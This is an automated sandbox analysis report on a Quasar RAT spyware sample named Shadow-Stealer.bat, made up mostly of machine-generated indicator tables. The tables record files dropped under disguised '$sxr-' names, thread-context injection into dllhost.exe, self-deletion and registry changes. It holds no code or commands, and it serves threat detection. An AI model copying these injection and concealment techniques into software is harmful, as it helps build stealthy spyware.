Malware Analysis Report

2024-10-19 06:32

Sample ID: 240528-ky6nhaee47
Target: Shadow-Stealer.bat
SHA256: 84ba648cfdd5c2ae8d3292fcc1702e385a1a26e915bd7275b5fde776212f2724
Tags: quasar v2.2.6 | tinsler spyware trojan
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10
SHA256: 84ba648cfdd5c2ae8d3292fcc1702e385a1a26e915bd7275b5fde776212f2724
Threat Level: Known bad

The file Shadow-Stealer.bat was found to be: Known bad.

Malicious Activity Summary

quasar v2.2.6 | tinsler spyware trojan

Suspicious use of NtCreateProcessExOtherParentProcess

Suspicious use of NtCreateUserProcessOtherParentProcess

Quasar payload

Quasar RAT

Executes dropped EXE

Deletes itself

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Program crash

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Modifies Internet Explorer settings

Runs ping.exe

Uses Task Scheduler COM API

Views/modifies file attributes

Enumerates system info in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious use of AdjustPrivilegeToken

Kills process with taskkill

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of UnmapMainImage

Suspicious behavior: GetForegroundWindowSpam

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-05-28 09:01

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-05-28 09:01
Reported: 2024-05-28 09:33
Platform: win11-20240508-en
Max time kernel: 1800s
Max time network: 1799s

Command Line

winlogon.exe

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Deletes itself

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk | C:\Windows\system32\DllHost.exe | N/A
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 5052 set thread context of 4804 | N/A | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | C:\Windows\System32\dllhost.exe
PID 5052 set thread context of 3852 | N/A | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | C:\Windows\SysWOW64\dllhost.exe
PID 3376 set thread context of 3288 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\System32\dllhost.exe
PID 3376 set thread context of 4968 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\SysWOW64\dllhost.exe
PID 3376 set thread context of 4656 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\System32\dllhost.exe
PID 3376 set thread context of 3340 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\SysWOW64\dllhost.exe
PID 5052 set thread context of 3380 | N/A | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | C:\Windows\System32\dllhost.exe
PID 5052 set thread context of 2892 | N/A | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | C:\Windows\SysWOW64\dllhost.exe
PID 3376 set thread context of 6044 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\System32\dllhost.exe
PID 3376 set thread context of 5480 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\SysWOW64\dllhost.exe
PID 3376 set thread context of 5628 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\System32\dllhost.exe
PID 3376 set thread context of 4968 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\SysWOW64\dllhost.exe
PID 3376 set thread context of 5760 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\System32\dllhost.exe
PID 3376 set thread context of 5364 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\SysWOW64\dllhost.exe
PID 3376 set thread context of 5236 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\System32\dllhost.exe
PID 3376 set thread context of 5732 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\SysWOW64\dllhost.exe
PID 3376 set thread context of 5532 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\System32\dllhost.exe
PID 3376 set thread context of 6064 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\SysWOW64\dllhost.exe

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A
File opened for modification | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A
File created | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A
File opened for modification | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A
File created | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A
File opened for modification | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A

Enumerates physical storage devices

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\svchost.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A
Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\svchost.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A

Kills process with taskkill

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\Explorer.EXE N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1716887099" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 28 May 2024 09:05:00 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\system32\svchost.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={57EC1572-54E1-45A8-8FEE-66D1A3BEFC90}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Sort = 0000000000000000000000000000000002000000f4eec83032a8e241ab32e3c3ca28fd29030000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 3a002e8005398e082303024b98265d99428e115f260001002600efbe11000000e0c9f43258a1da018955b7015ca1da018955b7015ca1da0114000000 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\$sxr-mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Rev = "0" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupView = "4294967295" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Windows\Explorer.EXE N/A
